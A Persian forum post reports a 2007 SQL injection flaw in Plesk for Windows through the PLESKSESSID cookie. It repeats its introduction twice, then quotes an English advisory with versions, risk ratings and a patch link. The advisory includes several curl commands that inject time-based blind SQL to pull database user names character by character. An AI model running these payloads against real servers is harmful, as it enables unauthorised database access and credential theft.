سه شنبه 3 مهر 1386, 12:41 قبلازظهر
سیستم PLESK یکی از معروفترین ابزار های مدیریت هاستینگ به شمار می آید .
آسیب پذیری ای در Plesk کشف شده است که به افراد اجازه ی اجرای حملات تزریق
کد به بانک اطلاعاتی SQL را می دهد . مقدار ورودی پارامتر کوکی "PLESKSESSID" پیش
از استفاده به عنوان Query های پایگاه داده SQL بصورت مناسب بررسی نمی شوند و ای
ن آسیب پذیری می تواند باعث سوء استفاده جهت ارسال Query های ماهرانه SQL و تزریق
کد های دلخواه به پایگاه داده SQL شود.
آسیب پذیری برای نسخه ویندوزی 7.6.1, 8.1.0, 8.1.1, و 8.2.0 گزارش شده است .
پیشنهاد ما به مدیران سرور ها دریافت بسته کوچک بروزرسانی می باشد .
[ جهت مشاهده لينك عضو شويد ! ]
منبع :
[ جهت مشاهده لينك عضو شويد ! ]
----------------------------------------------------
کدهای مخرب برای اثبات :
آسیب پذیری ای در Plesk کشف شده است که به افراد اجازه ی اجرای حملات تزریق
کد به بانک اطلاعاتی SQL را می دهد . مقدار ورودی پارامتر کوکی "PLESKSESSID" پیش
از استفاده به عنوان Query های پایگاه داده SQL بصورت مناسب بررسی نمی شوند و ای
ن آسیب پذیری می تواند باعث سوء استفاده جهت ارسال Query های ماهرانه SQL و تزریق
کد های دلخواه به پایگاه داده SQL شود.
آسیب پذیری برای نسخه ویندوزی 7.6.1, 8.1.0, 8.1.1, و 8.2.0 گزارش شده است .
پیشنهاد ما به مدیران سرور ها دریافت بسته کوچک بروزرسانی می باشد .
[ جهت مشاهده لينك عضو شويد ! ]
منبع :
[ جهت مشاهده لينك عضو شويد ! ]
----------------------------------------------------
کدهای مخرب برای اثبات :
Plesk "PLESKSESSID" SQL Injection
Date: 9-11-2007
Vendor: SWsoft (www.swsoft.com)
Package: Plesk MicrosoftWindows
Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0
Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3
Credit: Nick I Merritt
http://www.hackersafelabs.com/
Risk:Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required
Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major
Overview:
SWsoft Plesk is a comprehensive control panel
solution used by leading hosting providers worldwide for shared,
virtual and dedicated hosting.
Vulnerabilities:
Input passed to the "PLESKSESSID" cookie is not properly
sanitised in auth.php3 before being used in SQL
queries. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code.
SQL Injection Page: “login.php3”
SQL Injection Page: “auth.php3”
SQL Injection Cookie Parameter: “PLESKSESSID”
Examples:
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if
(substring(user,1,1)=char(97),BENCHMARK( 3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if
(substring(user,2,1)=char(100),BENCHMARK (3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if
(substring(user,3,1)=char(109),BENCHMARK (3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if
(substring(user,4,1)=char(105),BENCHMARK (3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if
(substring(user,5,1)=char(110),BENCHMARK (3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
Solution:
Apply the following patches - http://kb.swsoft.com/en/2159
برای اثبات میتوانید در کوکی ها مقدار را تغییر داده و نتیجه را ببینید.
فکر کردم شاید برای وب مستر ها خبر مهمی باشه.
با تشکر -- شهریار